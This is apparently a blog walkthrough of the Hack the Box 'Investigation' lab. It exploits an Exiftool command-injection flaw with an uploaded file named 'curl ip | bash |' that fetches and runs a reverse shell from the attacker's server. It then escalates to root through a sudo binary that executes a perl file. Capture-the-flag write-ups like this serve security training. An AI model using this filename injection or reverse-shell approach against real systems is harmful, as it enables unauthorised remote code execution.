In this post, I would like to share a walkthrough of the Investigation Machine from Hack the Box

This room will be considered an Insane machine on Hack the Box

What will you gain from the Investigation machine?

For the user flag, you will need to abuse a website that accepts a user-uploaded image which we will run Exiftool on the website. As a result, we found an older version of Exiftool that vulnerable to command injection.

As for the root flag, you need to find a logs on the Windows Event and analyze the log to obtain a password which we will make use of the malware that will runs as root.

Information Gathering on Investigation Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

Let’s access the website interface

However, the website doesn’t have many things to explore with

From us roaming just now, we are only aware of the potential username

However, there’s an upload function in the Free Service section.

Let’s find a jpg file and use it for uploading on the application.

As shown in the screenshot above, we have uploaded the jpg file to the application

Exiftool vulnerability

I did notice that there is Exiftool version is been vulnerable and the exploit can be found here

We can try to cp the jpg file to some command injection which will try to curl a file from our attacker’s machine

Let’s start our Python server

We also can insert the reverse shell into a new file that saves in HTML format

Let’s execute our listener with pwncat

Therefore, let’s upload the file that name as curl ip | bash |

It will look something like the above on burpsuite request

Once the file is successfully uploaded to the application, we will be getting the output as shown above.

When we are looking back on the Python server, it shows that the application is retrieving our HTML file

Text

Description automatically generated

Boom! We managed to obtain the reverse shell connection back to us

Text

Description automatically generated

We notice that the only user available on the machine is smorton

Text

Description automatically generated

Let’s upload pspy64 into our victim’s machine to see any process that we can abuse

We should be giving the execution permission to the file and running it

From the pspy64 output, i notice that there’s a file that looks suspicious which is /var/www/html

As a result, let’s access the folder to see what is stored inside there.

There’s nothing saved inside the analysed_log file

It’s hard to read when you try to string the file content

The msg file is a CDFV2 Microsoft Outlook Message

Text

Description automatically generated

Therefore, we should convert the msg file to eml file format

Graphical user interface

Description automatically generated with medium confidence

We can read the content of the file by opening either Outlook or LibreOffice

Graphical user interface, text, application

Description automatically generated

Next, we need to unzip the file and managed to find a password from all those information

Text

Description automatically generated with medium confidence

We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access

Text

Description automatically generated

As usual, we can find any malicious SUID binary by running the command “sudo -l”

Text

Description automatically generated

We can analyze the SUID binary by using IDA pro or Ghidra but I will just use string to capture the useful information from the file

Text

Description automatically generated

As a result, let’s create a perl file that will contain the content of exec(“any command”)

Let’s execute the SUID binary with the perl file and passcode

We can read the root flag by typing the “cat root.txt” command

Extra Information

Categories:

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *